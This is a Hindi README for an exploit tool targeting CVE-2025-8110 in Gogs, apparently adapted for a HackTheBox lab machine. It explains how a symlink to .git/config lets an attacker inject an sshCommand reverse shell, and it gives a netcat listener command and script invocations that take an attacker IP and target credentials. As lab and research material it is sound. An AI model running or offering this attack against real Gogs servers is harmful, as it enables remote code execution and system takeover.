
Gogs सेवा का शोषण करें और रूट उपयोगकर्ता प्राप्त करें
अस्वीकरण: यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। इसका उपयोग केवल उन्हीं सिस्टमों पर करें जिनके परीक्षण की आपके पास स्पष्ट अनुमति हो।
यह zAbuQasem/gogs-CVE-2025-8110 का संशोधित संस्करण है, जिसे HackTheBox पर Silentium मशीन के विरुद्ध काम करने के लिए अनुकूलित किया गया है। मूल PoC को Silentium की विशिष्ट Gogs कॉन्फ़िगरेशन और प्रमाणीकरण प्रवाह को संभालने के लिए समायोजन की आवश्यकता थी।
CVE-2025-8110 Gogs में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता है, जो एक सेल्फ-होस्टेड Git सेवा है।
Gogs का file-update API एंडपॉइंट (PUT /api/v1/repos/.../contents/<file>) यह सत्यापित नहीं करता है कि लक्षित फ़ाइल symlink है या नहीं। एक प्रमाणित हमलावर रिपॉज़िटरी में एक symlink पुश कर सकता है जो .git/config की ओर इंगित करता है, फिर API का उपयोग करके उसे दुर्भावनापूर्ण पेलोड से ओवरराइट कर सकता है। पेलोड git config में एक कस्टम sshCommand इंजेक्ट करता है, जिसे Gogs उस रिपॉज़िटरी पर अगली बार SSH ऑपरेशन करते समय सर्वर-साइड निष्पादित करता है, जिसके परिणामस्वरूप रिमोट कोड एक्ज़ीक्यूशन होता है।
malicious_link -> .git/config) स्थापित करता है, और उसे पुश करता है।.git/config लिखता है जिसमें sshCommand = <reverse shell> होता है।.git/config को ओवरराइट करता है, जिससे अगली SSH ऑपरेशन पर शेल ट्रिगर हो जाता है।निर्भरताएँ इंस्टॉल करें:
pip install -r requirements.txt
लिसनर शुरू करें:
nc -lvnp <PORT>
एक्सप्लॉइट चलाएँ:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>
वैकल्पिक — Burp Suite के माध्यम से रूट करें:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
| फ़्लैग | विवरण |
|---|
-u | Gogs बेस URL |
-lh | आपका अटैकर IP (रिवर्स शेल होस्ट) |
-lp | आपका लिसनर पोर्ट |
-un | आपका पंजीकृत Gogs उपयोगकर्ता नाम |
-pw | आपका Gogs पासवर्ड |
-x | (वैकल्पिक) localhost:8080 पर Burp के माध्यम से ट्रैफ़िक रूट करें |